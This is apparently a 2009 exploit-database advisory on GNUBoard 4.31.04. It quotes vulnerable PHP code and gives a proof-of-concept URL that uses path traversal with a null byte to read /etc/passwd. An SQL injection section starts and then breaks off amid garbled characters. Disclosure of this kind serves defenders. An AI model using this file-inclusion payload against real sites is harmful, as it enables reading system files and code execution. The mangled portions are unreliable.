[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : GNUBoard 4.31.04 (09.01.30) Multiple Local/Remote Vulnerabilities
# Published : 2009-01-30
# Author : make0day
# Previous Title : ReVou Twitter Clone (XSS/SQL) Multiple Remote Vulnerabilities
# Next Title : BPAutoSales 1.0.1 (XSS/SQL) Multiple Remote Vulnerabilities
GNUBoard V4.31.04 (09.01.30) Multiple Local/Remote Vulnerability
bY make0day@gmail.com
/*************************
SIR GNUBoard (VERSION 4.31.04 (09.01.30))is a widely used bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
But we find a file include vulnerability affects SIR GNUBoard.
In special conditions,it may be used as a remote file include vulnerability .
This issue to execute arbitrary PHP code on an affected computer with the privileges of the affected Web server.
Here is the details:
**************************/
TEST ON VERSION 4.31.04 (08.01.30)
/***************************
Local File Inclusion Vulnerability
/poll_result.php
include_once("./_common.php");
$po = sql_fetch(" select * from $g4[poll_table] where po_id = '$po_id' ");
if (!$po[po_id])
????????
echo "<script language='javascript' src='$g4[path]/js/sideview.js'></script>";
if (!$skin_dir) $skin_dir = "basic";
$poll_skin_path = "$g4[path]/skin/poll/$skin_dir";
include_once ("$poll_skin_path/poll_result.skin.php"); //file include
*************************/
poc:
http://test.com/GnuBoard/bbs/poll_result.php?po_id=177&skin_dir=../../../../../../../../etc/passwd%00
/***************************
SQL Injection Vulnerability
/register_form.skin.php
<?
if (!defined("_GNUBOARD_")) exit;
?>
<style type="text/css">
<!--
????????
function fregisterform_submit(f)
{
if (f.w.value == "") {
reg_mb_id_check();
if ($F('mb_id_enabled')!='000') {
alert('?????????????